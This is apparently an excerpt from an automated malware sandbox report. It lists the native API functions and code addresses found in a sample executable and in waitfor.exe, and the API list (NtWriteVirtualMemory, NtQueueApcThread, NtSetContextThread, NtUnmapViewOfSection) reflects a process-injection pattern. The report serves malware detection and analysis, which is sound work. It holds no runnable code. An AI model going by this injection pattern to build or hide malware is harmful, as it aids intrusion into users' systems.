                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2C00 NtQueryInformationProcess,4_2_014E2C00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2CC0 NtQueryVirtualMemory,4_2_014E2CC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2CF0 NtOpenProcess,4_2_014E2CF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2CA0 NtQueryInformationToken,4_2_014E2CA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2F60 NtCreateProcessEx,4_2_014E2F60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2F30 NtCreateSection,4_2_014E2F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2FE0 NtCreateFile,4_2_014E2FE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2F90 NtProtectVirtualMemory,4_2_014E2F90
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2FA0 NtQuerySection,4_2_014E2FA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2FB0 NtResumeThread,4_2_014E2FB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2E30 NtWriteVirtualMemory,4_2_014E2E30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2EE0 NtQueueApcThread,4_2_014E2EE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2E80 NtReadVirtualMemory,4_2_014E2E80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E2EA0 NtAdjustPrivilegesToken,4_2_014E2EA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E3010 NtOpenDirectoryObject,4_2_014E3010
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E3090 NtSetValueKey,4_2_014E3090
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E39B0 NtGetContextThread,4_2_014E39B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E3D70 NtOpenThread,4_2_014E3D70
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E3D10 NtOpenProcessToken,4_2_014E3D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D4650 NtSuspendThread,LdrInitializeThunk,7_2_047D4650
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D4340 NtSetContextThread,LdrInitializeThunk,7_2_047D4340
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_047D2C70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2C60 NtCreateKey,LdrInitializeThunk,7_2_047D2C60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_047D2CA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_047D2D30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_047D2D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_047D2DF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,7_2_047D2DD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_047D2EE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_047D2E80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2F30 NtCreateSection,LdrInitializeThunk,7_2_047D2F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2FE0 NtCreateFile,LdrInitializeThunk,7_2_047D2FE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2FB0 NtResumeThread,LdrInitializeThunk,7_2_047D2FB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2AF0 NtWriteFile,LdrInitializeThunk,7_2_047D2AF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2AD0 NtReadFile,LdrInitializeThunk,7_2_047D2AD0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2B60 NtClose,LdrInitializeThunk,7_2_047D2B60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_047D2BF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_047D2BE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_047D2BA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D35C0 NtCreateMutant,LdrInitializeThunk,7_2_047D35C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D39B0 NtGetContextThread,LdrInitializeThunk,7_2_047D39B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2C00 NtQueryInformationProcess,7_2_047D2C00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2CF0 NtOpenProcess,7_2_047D2CF0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2CC0 NtQueryVirtualMemory,7_2_047D2CC0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2D00 NtSetInformationFile,7_2_047D2D00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2DB0 NtEnumerateKey,7_2_047D2DB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2E30 NtWriteVirtualMemory,7_2_047D2E30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2EA0 NtAdjustPrivilegesToken,7_2_047D2EA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2F60 NtCreateProcessEx,7_2_047D2F60
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2FA0 NtQuerySection,7_2_047D2FA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2F90 NtProtectVirtualMemory,7_2_047D2F90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2AB0 NtWaitForSingleObject,7_2_047D2AB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D2B80 NtQueryInformationFile,7_2_047D2B80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D3010 NtOpenDirectoryObject,7_2_047D3010
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D3090 NtSetValueKey,7_2_047D3090
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D3D70 NtOpenThread,7_2_047D3D70
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D3D10 NtOpenProcessToken,7_2_047D3D10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00839750 NtCreateFile,7_2_00839750
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008398B0 NtReadFile,7_2_008398B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_008399A0 NtDeleteFile,7_2_008399A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00839A40 NtClose,7_2_00839A40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_00839B90 NtAllocateVirtualMemory,7_2_00839B90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABF1F6 NtQueryInformationProcess,7_2_04ABF1F6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04ABF9CB NtUnmapViewOfSection,7_2_04ABF9CB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_0296D5840_2_0296D584
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DD5000_2_071DD500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DB4280_2_071DB428
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DD4F00_2_071DD4F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DAFF00_2_071DAFF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DCC180_2_071DCC18
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DCC280_2_071DCC28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 0_2_071DABB80_2_071DABB8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00418ED34_2_00418ED3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004170DE4_2_004170DE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004170E34_2_004170E3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0040E9034_2_0040E903
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004109134_2_00410913
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004049244_2_00404924
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004011F04_2_004011F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0040EA474_2_0040EA47
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0040EA534_2_0040EA53
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004033004_2_00403300
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00401CC04_2_00401CC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00401CB94_2_00401CB9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0042F5C34_2_0042F5C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_00401E204_2_00401E20
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004026234_2_00402623
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004026304_2_00402630
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004106ED4_2_004106ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_004106F34_2_004106F3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015381584_2_01538158
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A01004_2_014A0100
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154A1184_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015681CC4_2_015681CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015641A24_2_015641A2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015701AA4_2_015701AA
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015420004_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156A3524_2_0156A352
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015703E64_2_015703E6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BE3F04_2_014BE3F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015502744_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015302C04_2_015302C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B05354_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015705914_2_01570591
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015624464_2_01562446
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015544204_2_01554420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155E4F64_2_0155E4F6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D47504_2_014D4750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B07704_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AC7C04_2_014AC7C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CC6E04_2_014CC6E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C69624_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B29A04_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0157A9A64_2_0157A9A6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BA8404_2_014BA840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B28404_2_014B2840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014DE8F04_2_014DE8F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014968B84_2_014968B8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156AB404_2_0156AB40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01566BD74_2_01566BD7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AEA804_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BAD004_2_014BAD00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154CD1F4_2_0154CD1F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014AADE04_2_014AADE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C8DBF4_2_014C8DBF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0C004_2_014B0C00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A0CF24_2_014A0CF2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01550CB54_2_01550CB5
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01524F404_2_01524F40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01552F304_2_01552F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F2F284_2_014F2F28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014D0F304_2_014D0F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A2FC84_2_014A2FC8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BCFE04_2_014BCFE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0152EFA04_2_0152EFA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B0E594_2_014B0E59
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156EE264_2_0156EE26
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156EEDB4_2_0156EEDB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156CE934_2_0156CE93
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014C2E904_2_014C2E90
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014E516C4_2_014E516C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149F1724_2_0149F172
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0157B16B4_2_0157B16B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014BB1B04_2_014BB1B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B70C04_2_014B70C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155F0CC4_2_0155F0CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156F0E04_2_0156F0E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015670E94_2_015670E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0149D34C4_2_0149D34C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156132D4_2_0156132D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F739A4_2_014F739A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CB2C04_2_014CB2C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015512ED4_2_015512ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B52A04_2_014B52A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015675714_2_01567571
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015795C34_2_015795C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154D5B04_2_0154D5B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A14604_2_014A1460
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156F43F4_2_0156F43F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014A17EC4_2_014A17EC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156F7B04_2_0156F7B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F56304_2_014F5630
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015616CC4_2_015616CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B99504_2_014B9950
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CB9504_2_014CB950
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_015459104_2_01545910
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0151D8004_2_0151D800
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B38E04_2_014B38E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156FB764_2_0156FB76
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01525BF04_2_01525BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014EDBF94_2_014EDBF9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CFB804_2_014CFB80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01567A464_2_01567A46
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156FA494_2_0156FA49
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01523A6C4_2_01523A6C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0155DAC64_2_0155DAC6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014F5AA04_2_014F5AA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01551AA34_2_01551AA3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0154DAAC4_2_0154DAAC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B3D404_2_014B3D40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01561D5A4_2_01561D5A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01567D734_2_01567D73
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014CFDC04_2_014CFDC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_01529C324_2_01529C32
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156FCF24_2_0156FCF2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156FF094_2_0156FF09
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B1F924_2_014B1F92
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_0156FFB14_2_0156FFB1
                Source: C:\Users\user\Desktop\suBpo1g13Q.exeCode function: 4_2_014B9EB04_2_014B9EB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0484E4F67_2_0484E4F6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048444207_2_04844420
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048524467_2_04852446
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048605917_2_04860591
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A05357_2_047A0535
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BC6E07_2_047BC6E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A07707_2_047A0770
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047C47507_2_047C4750
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0479C7C07_2_0479C7C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048320007_2_04832000
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048541A27_2_048541A2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048601AA7_2_048601AA
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048581CC7_2_048581CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047901007_2_04790100
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0483A1187_2_0483A118
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048281587_2_04828158
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048202C07_2_048202C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048402747_2_04840274
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048603E67_2_048603E6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047AE3F07_2_047AE3F0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485A3527_2_0485A352
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04840CB57_2_04840CB5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A0C007_2_047A0C00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04790CF27_2_04790CF2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047AAD007_2_047AAD00
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0479ADE07_2_0479ADE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0483CD1F7_2_0483CD1F
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047B8DBF7_2_047B8DBF
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485CE937_2_0485CE93
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A0E597_2_047A0E59
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485EEDB7_2_0485EEDB
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485EE267_2_0485EE26
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047B2E907_2_047B2E90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0481EFA07_2_0481EFA0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047C0F307_2_047C0F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047E2F287_2_047E2F28
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047ACFE07_2_047ACFE0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04792FC87_2_04792FC8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04842F307_2_04842F30
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04814F407_2_04814F40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047AA8407_2_047AA840
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A28407_2_047A2840
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047CE8F07_2_047CE8F0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047868B87_2_047868B8
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047B69627_2_047B6962
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0486A9A67_2_0486A9A6
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A29A07_2_047A29A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0479EA807_2_0479EA80
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04856BD77_2_04856BD7
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485AB407_2_0485AB40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047914607_2_04791460
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485F43F7_2_0485F43F
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0483D5B07_2_0483D5B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048695C37_2_048695C3
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048575717_2_04857571
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048516CC7_2_048516CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047E56307_2_047E5630
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485F7B07_2_0485F7B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047917EC7_2_047917EC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0484F0CC7_2_0484F0CC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485F0E07_2_0485F0E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048570E97_2_048570E9
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A70C07_2_047A70C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0478F1727_2_0478F172
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047D516C7_2_047D516C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047AB1B07_2_047AB1B0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0486B16B7_2_0486B16B
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048412ED7_2_048412ED
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BB2C07_2_047BB2C0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A52A07_2_047A52A0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0478D34C7_2_0478D34C
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485132D7_2_0485132D
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047E739A7_2_047E739A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485FCF27_2_0485FCF2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04819C327_2_04819C32
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A3D407_2_047A3D40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BFDC07_2_047BFDC0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04851D5A7_2_04851D5A
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04857D737_2_04857D73
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A9EB07_2_047A9EB0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485FFB17_2_0485FFB1
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0485FF097_2_0485FF09
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04763FD57_2_04763FD5
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04763FD27_2_04763FD2
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A1F927_2_047A1F92
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0480D8007_2_0480D800
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A38E07_2_047A38E0
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047A99507_2_047A9950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_047BB9507_2_047BB950
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_048359107_2_04835910
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_04841AA37_2_04841AA3
